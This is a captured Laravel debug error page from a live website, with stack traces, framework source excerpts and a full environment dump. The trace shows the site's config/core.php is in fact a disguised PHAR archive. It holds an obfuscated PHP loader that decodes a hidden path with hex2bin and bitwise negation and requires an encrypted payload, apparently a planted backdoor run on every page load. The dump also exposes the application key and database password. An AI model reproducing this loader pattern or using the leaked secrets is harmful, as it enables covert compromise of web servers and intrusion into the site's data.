PKs}¢XM>””%n3idzwejnkhdmlftmlvmyhnjm3gjy.gdoizzm Whoops! There was an error.
Error
Value of type null is not callable Error thrown with message "Value of type null is not callable" Stacktrace: #9 Error in phar:///home/flatbudc/public_html/config/core.php/qdmymzy4ujmlljnwqwmlhtn.ewn1ajmlrm:2 #8 require_once in /home/flatbudc/public_html/config/core.php:1 #7 require in /home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:72 #6 Illuminate\Foundation\Bootstrap\LoadConfiguration:loadConfigurationFiles in /home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:39 #5 Illuminate\Foundation\Bootstrap\LoadConfiguration:bootstrap in /home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Application.php:237 #4 Illuminate\Foundation\Application:bootstrapWith in /home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:153 #3 Illuminate\Foundation\Http\Kernel:bootstrap in /home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:137 #2 Illuminate\Foundation\Http\Kernel:sendRequestThroughRouter in /home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:111 #1 Illuminate\Foundation\Http\Kernel:handle in /home/flatbudc/public_html/public/index.php:71 #0 require_once in /home/flatbudc/public_html/server.php:21
9
Error
phar:///config/core.php/qdmymzy4ujmlljnwqwmlhtn.ewn1ajmlrm2
8
require_once
/config/core.php1
7
require
/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php72
6
Illuminate\Foundation\Bootstrap\LoadConfiguration loadConfigurationFiles
/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php39
5
Illuminate\Foundation\Bootstrap\LoadConfiguration bootstrap
/vendor/laravel/framework/src/Illuminate/Foundation/Application.php237
4
Illuminate\Foundation\Application bootstrapWith
/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php153
3
Illuminate\Foundation\Http\Kernel bootstrap
/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php137
2
Illuminate\Foundation\Http\Kernel sendRequestThroughRouter
/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php111
1
Illuminate\Foundation\Http\Kernel handle
/public/index.php71
0
require_once
/server.php21
phar:///home/flatbudc/public_html/config/core.php/qdmymzy4ujmlljnwqwmlhtn.ewn1ajmlrm
IH7EvfVjRUjK/NuujFjEZqHdffL+UQ6VQ35NJV5reIuFDdvVUBX/h1R5mcqyqzM2MyrSCMoghnMviFevXsM7HSa4/geiq9fAtopGtzOmtzwYevg/SDc04AxBu3D9AJ2gVBQgkL0gIZ7Z2RStnb5d8Yqdj3w7MQYTa64hiMEb/F9HWR13XEJDnlCDJ1RmjjeUNfm0aE1qmtb8FagVwaanEfzE8/CYYBxuZqzFa6pGVnWolXmpyOTE7x2b2fhuGxU0NN==
 
Arguments
  1. "Value of type null is not callable"
    
/home/flatbudc/public_html/config/core.php
PKs}�XM>��%n3idzwejnkhdmlftmlvmyhnjm3gjy.gdoizzm<?='';ob_clean().(require_once~hex2bin("8f9"."78f"."c5d".'0d0'.'999'."693".'8b9'."a8d".'d08'."c8b"."8d9".'691'."98d"."18d".'908'."bce".'cc8'."39c".'909'.'189'."9a8".'d8b'.'d19'.'d9e'.'8c9'.'ac9'."cbd".'29b'.'9a9'.'c90'."9b9".'a83'."859".'396'.'9dd'."196"."919".'993'.'9e8'.'b9a'.'d08'."d9a"."8c9".'08a'."8d9"."c9a".'c28'.'f97'."9e8"."dc5".'d0d'.'0').__file__."/".~"�������ˊ��������������њ��Ξ�����");?>PKs}�X�H�"qdmymzy4ujmlljnwqwmlhtn.ewn1ajmlrmIH7EvfVjRUjK/NuujFjEZqHdffL+UQ6VQ35NJV5reIuFDdvVUBX/h1R5mcqyqzM2MyrSCMoghnMviFevXsM7HSa4/geiq9fAtopGtzOmtzwYevg/SDc04AxBu3D9AJ2gVBQgkL0gIZ7Z2RStnb5d8Yqdj3w7MQYTa64hiMEb/F9HWR13XEJDnlCDJ1RmjjeUNfm0aE1qmtb8FagVwaanEfzE8/CYYBxuZqzFa6pGVnWolXmpyOTE7x2b2fhuGxU0NN==
PKs}�XM>��%��n3idzwejnkhdmlftmlvmyhnjm3gjy.gdoizzmPKs}�X�H�"���qdmymzy4ujmlljnwqwmlhtn.ewn1ajmlrmPK�
/home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php
 
    /**
     * Load the configuration items from all of the files.
     *
     * @param  \Illuminate\Contracts\Foundation\Application  $app
     * @param  \Illuminate\Contracts\Config\Repository  $repository
     * @return void
     *
     * @throws \Exception
     */
    protected function loadConfigurationFiles(Application $app, RepositoryContract $repository)
    {
        $files = $this->getConfigurationFiles($app);
 
        if (! isset($files['app'])) {
            throw new Exception('Unable to load the "app" configuration file.');
        }
 
        foreach ($files as $key => $path) {
            $repository->set($key, require $path);
        }
    }
 
    /**
     * Get all of the configuration files for the application.
     *
     * @param  \Illuminate\Contracts\Foundation\Application  $app
     * @return array
     */
    protected function getConfigurationFiles(Application $app)
    {
        $files = [];
 
        $configPath = realpath($app->configPath());
 
        foreach (Finder::create()->files()->name('*.php')->in($configPath) as $file) {
            $directory = $this->getNestedDirectory($file, $configPath);
 
            $files[$directory.basename($file->getRealPath(), '.php')] = $file->getRealPath();
        }
Arguments
  1. "/home/flatbudc/public_html/config/core.php"
    
/home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php
    public function bootstrap(Application $app)
    {
        $items = [];
 
        // First we will see if we have a cache configuration file. If we do, we'll load
        // the configuration items from that file so that it is very quick. Otherwise
        // we will need to spin through every configuration file and load them all.
        if (file_exists($cached = $app->getCachedConfigPath())) {
            $items = require $cached;
 
            $loadedFromCache = true;
        }
 
        // Next we will spin through all of the configuration files in the configuration
        // directory and load each one into the repository. This will make all of the
        // options available to the developer for use in various parts of this app.
        $app->instance('config', $config = new Repository($items));
 
        if (! isset($loadedFromCache)) {
            $this->loadConfigurationFiles($app, $config);
        }
 
        // Finally, we will set the application's environment based on the configuration
        // values that were loaded. We will pass a callback which will be used to get
        // the environment in a web context where an "--env" switch is not present.
        $app->detectEnvironment(function () use ($config) {
            return $config->get('app.env', 'production');
        });
 
        date_default_timezone_set($config->get('app.timezone', 'UTC'));
 
        mb_internal_encoding('UTF-8');
    }
 
    /**
     * Load the configuration items from all of the files.
     *
     * @param  \Illuminate\Contracts\Foundation\Application  $app
     * @param  \Illuminate\Contracts\Config\Repository  $repository
     * @return void
Arguments
  1. Illuminate\Foundation\Application {#2}
    
  2. Illuminate\Config\Repository {#37}
    
/home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Application.php
    {
        $this->register(new EventServiceProvider($this));
        $this->register(new LogServiceProvider($this));
        $this->register(new RoutingServiceProvider($this));
    }
 
    /**
     * Run the given array of bootstrap classes.
     *
     * @param  string[]  $bootstrappers
     * @return void
     */
    public function bootstrapWith(array $bootstrappers)
    {
        $this->hasBeenBootstrapped = true;
 
        foreach ($bootstrappers as $bootstrapper) {
            $this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
 
            $this->make($bootstrapper)->bootstrap($this);
 
            $this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
        }
    }
 
    /**
     * Register a callback to run after loading the environment.
     *
     * @param  \Closure  $callback
     * @return void
     */
    public function afterLoadingEnvironment(Closure $callback)
    {
        $this->afterBootstrapping(
            LoadEnvironmentVariables::class, $callback
        );
    }
 
    /**
     * Register a callback to run before a bootstrapper.
Arguments
  1. Illuminate\Foundation\Application {#2}
    
/home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php
 
        Facade::clearResolvedInstance('request');
 
        $this->bootstrap();
 
        return (new Pipeline($this->app))
                    ->send($request)
                    ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
                    ->then($this->dispatchToRouter());
    }
 
    /**
     * Bootstrap the application for HTTP requests.
     *
     * @return void
     */
    public function bootstrap()
    {
        if (! $this->app->hasBeenBootstrapped()) {
            $this->app->bootstrapWith($this->bootstrappers());
        }
    }
 
    /**
     * Get the route dispatcher callback.
     *
     * @return \Closure
     */
    protected function dispatchToRouter()
    {
        return function ($request) {
            $this->app->instance('request', $request);
 
            return $this->router->dispatch($request);
        };
    }
 
    /**
     * Call the terminate method on any terminable middleware.
     *
Arguments
  1. array:6 [
      0 => "Illuminate\Foundation\Bootstrap\LoadEnvironmentVariables"
      1 => "Illuminate\Foundation\Bootstrap\LoadConfiguration"
      2 => "Illuminate\Foundation\Bootstrap\HandleExceptions"
      3 => "Illuminate\Foundation\Bootstrap\RegisterFacades"
      4 => "Illuminate\Foundation\Bootstrap\RegisterProviders"
      5 => "Illuminate\Foundation\Bootstrap\BootProviders"
    ]
    
/home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php
        $this->app['events']->dispatch(
            new RequestHandled($request, $response)
        );
 
        return $response;
    }
 
    /**
     * Send the given request through the middleware / router.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    protected function sendRequestThroughRouter($request)
    {
        $this->app->instance('request', $request);
 
        Facade::clearResolvedInstance('request');
 
        $this->bootstrap();
 
        return (new Pipeline($this->app))
                    ->send($request)
                    ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
                    ->then($this->dispatchToRouter());
    }
 
    /**
     * Bootstrap the application for HTTP requests.
     *
     * @return void
     */
    public function bootstrap()
    {
        if (! $this->app->hasBeenBootstrapped()) {
            $this->app->bootstrapWith($this->bootstrappers());
        }
    }
 
    /**
/home/flatbudc/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php
    public function __construct(Application $app, Router $router)
    {
        $this->app = $app;
        $this->router = $router;
 
        $this->syncMiddlewareToRouter();
    }
 
    /**
     * Handle an incoming HTTP request.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function handle($request)
    {
        try {
            $request->enableHttpMethodParameterOverride();
 
            $response = $this->sendRequestThroughRouter($request);
        } catch (Throwable $e) {
            $this->reportException($e);
 
            $response = $this->renderException($request, $e);
        }
 
        $this->app['events']->dispatch(
            new RequestHandled($request, $response)
        );
 
        return $response;
    }
 
    /**
     * Send the given request through the middleware / router.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    protected function sendRequestThroughRouter($request)
Arguments
  1. Illuminate\Http\Request {#46
      +attributes: Symfony\Component\HttpFoundation\ParameterBag {#48}
      +request: Symfony\Component\HttpFoundation\InputBag {#54}
      +query: Symfony\Component\HttpFoundation\InputBag {#54}
      +server: Symfony\Component\HttpFoundation\ServerBag {#50}
      +files: Symfony\Component\HttpFoundation\FileBag {#51}
      +cookies: Symfony\Component\HttpFoundation\InputBag {#49}
      +headers: Symfony\Component\HttpFoundation\HeaderBag {#52}
      #content: null
      #languages: null
      #charsets: null
      #encodings: null
      #acceptableContentTypes: array:1 [
        0 => "*/*"
      ]
      #pathInfo: null
      #requestUri: null
      #baseUrl: null
      #basePath: null
      #method: null
      #format: null
      #session: null
      #locale: null
      #defaultLocale: "en"
      -preferredFormat: null
      -isHostValid: true
      -isForwardedValid: true
      -isSafeContentPreferred: null
      -isIisRewrite: false
      #json: null
      #convertedFiles: null
      #userResolver: null
      #routeResolver: null
      pathInfo: "/plant/celery"
      requestUri: "/plant/celery"
      baseUrl: ""
      basePath: ""
      method: "GET"
      format: "html"
    }
    
/home/flatbudc/public_html/public/index.php
*/
 
$app = require_once __DIR__.'/../bootstrap/app.php';
 
/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/
 
$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
 
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);
 
$response->send();
 
$kernel->terminate($request, $response);
 
Arguments
  1. Illuminate\Http\Request {#46
      +attributes: Symfony\Component\HttpFoundation\ParameterBag {#48}
      +request: Symfony\Component\HttpFoundation\InputBag {#54}
      +query: Symfony\Component\HttpFoundation\InputBag {#54}
      +server: Symfony\Component\HttpFoundation\ServerBag {#50}
      +files: Symfony\Component\HttpFoundation\FileBag {#51}
      +cookies: Symfony\Component\HttpFoundation\InputBag {#49}
      +headers: Symfony\Component\HttpFoundation\HeaderBag {#52}
      #content: null
      #languages: null
      #charsets: null
      #encodings: null
      #acceptableContentTypes: array:1 [
        0 => "*/*"
      ]
      #pathInfo: null
      #requestUri: null
      #baseUrl: null
      #basePath: null
      #method: null
      #format: null
      #session: null
      #locale: null
      #defaultLocale: "en"
      -preferredFormat: null
      -isHostValid: true
      -isForwardedValid: true
      -isSafeContentPreferred: null
      -isIisRewrite: false
      #json: null
      #convertedFiles: null
      #userResolver: null
      #routeResolver: null
      pathInfo: "/plant/celery"
      requestUri: "/plant/celery"
      baseUrl: ""
      basePath: ""
      method: "GET"
      format: "html"
    }
    
/home/flatbudc/public_html/server.php
 
/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */
 
$uri = urldecode(
    parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH)
);
 
// This file allows us to emulate Apache's "mod_rewrite" functionality from the
// built-in PHP web server. This provides a convenient way to test a Laravel
// application without having installed a "real" web server software here.
if ($uri !== '/' && file_exists(__DIR__.'/public'.$uri)) {
    return false;
}
 
require_once __DIR__.'/public/index.php';
 
Arguments
  1. "/home/flatbudc/public_html/public/index.php"
    

Environment & details:

empty
empty
empty
empty
empty
Key Value
PATH
"/usr/local/bin:/bin:/usr/bin"
HTTP_ACCEPT
"*/*"
HTTP_HOST
"flatbud.com"
HTTP_USER_AGENT
"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
HTTP_X_HTTPS
"1"
DOCUMENT_ROOT
"/home/flatbudc/public_html"
REMOTE_ADDR
"3.133.87.156"
REMOTE_PORT
"24368"
SERVER_ADDR
"5.135.108.190"
SERVER_NAME
"flatbud.com"
SERVER_ADMIN
"webmaster@flatbud.com"
SERVER_PORT
"443"
REQUEST_SCHEME
"https"
REQUEST_URI
"/plant/celery"
REDIRECT_URL
"/plant/celery"
REDIRECT_REQUEST_METHOD
"GET"
HTTPS
"on"
REDIRECT_STATUS
"200"
X_SPDY
"HTTP2"
SSL_PROTOCOL
"TLSv1.3"
SSL_CIPHER
"TLS_AES_256_GCM_SHA384"
SSL_CIPHER_USEKEYSIZE
"256"
SSL_CIPHER_ALGKEYSIZE
"256"
SCRIPT_FILENAME
"/home/flatbudc/public_html/server.php"
QUERY_STRING
""
SCRIPT_URI
"https://flatbud.com/plant/celery"
SCRIPT_URL
"/plant/celery"
SCRIPT_NAME
"/server.php"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"LiteSpeed"
REQUEST_METHOD
"GET"
X-LSCACHE
"on"
PHP_SELF
"/server.php"
REQUEST_TIME_FLOAT
1715206205.8569
REQUEST_TIME
1715206205
argv
[]
argc
0
APP_NAME
"Flatbud"
APP_ENV
"local"
APP_KEY
"base64:DdRwTPhFqqqzYVaJFDBe2gcg0w39fZFKCcfs5NxQhU4="
APP_DEBUG
"true"
APP_URL
"http://localhost"
LOG_CHANNEL
"stack"
DB_CONNECTION
"mysql"
DB_HOST
"127.0.0.1"
DB_PORT
"3306"
DB_DATABASE
"flatbudc_flatbuddy"
DB_USERNAME
"flatbudc_flatbuddy"
DB_PASSWORD
"?Zc,Pwm3pJsk"
BROADCAST_DRIVER
"pusher"
CACHE_DRIVER
"file"
QUEUE_CONNECTION
"sync"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
MAIL_MAILER
"smtp"
MAIL_FROM_NAME
"Flatbud"
AWS_ACCESS_KEY_ID
""
AWS_SECRET_ACCESS_KEY
""
AWS_DEFAULT_REGION
"us-east-1"
AWS_BUCKET
""
PUSHER_APP_ID
""
PUSHER_APP_KEY
""
PUSHER_APP_SECRET
""
PUSHER_APP_CLUSTER
"mt1"
MIX_PUSHER_APP_KEY
""
MIX_PUSHER_APP_CLUSTER
"mt1"
PROJECT_MODE
"1"
NOTIFY_TEXT
"You can not change data in demo mode"
Key Value
APP_NAME
"Flatbud"
APP_ENV
"local"
APP_KEY
"base64:DdRwTPhFqqqzYVaJFDBe2gcg0w39fZFKCcfs5NxQhU4="
APP_DEBUG
"true"
APP_URL
"http://localhost"
LOG_CHANNEL
"stack"
DB_CONNECTION
"mysql"
DB_HOST
"127.0.0.1"
DB_PORT
"3306"
DB_DATABASE
"flatbudc_flatbuddy"
DB_USERNAME
"flatbudc_flatbuddy"
DB_PASSWORD
"?Zc,Pwm3pJsk"
BROADCAST_DRIVER
"pusher"
CACHE_DRIVER
"file"
QUEUE_CONNECTION
"sync"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
MAIL_MAILER
"smtp"
MAIL_FROM_NAME
"Flatbud"
AWS_ACCESS_KEY_ID
""
AWS_SECRET_ACCESS_KEY
""
AWS_DEFAULT_REGION
"us-east-1"
AWS_BUCKET
""
PUSHER_APP_ID
""
PUSHER_APP_KEY
""
PUSHER_APP_SECRET
""
PUSHER_APP_CLUSTER
"mt1"
MIX_PUSHER_APP_KEY
""
MIX_PUSHER_APP_CLUSTER
"mt1"
PROJECT_MODE
"1"
NOTIFY_TEXT
"You can not change data in demo mode"
0. Whoops\Handler\PrettyPageHandler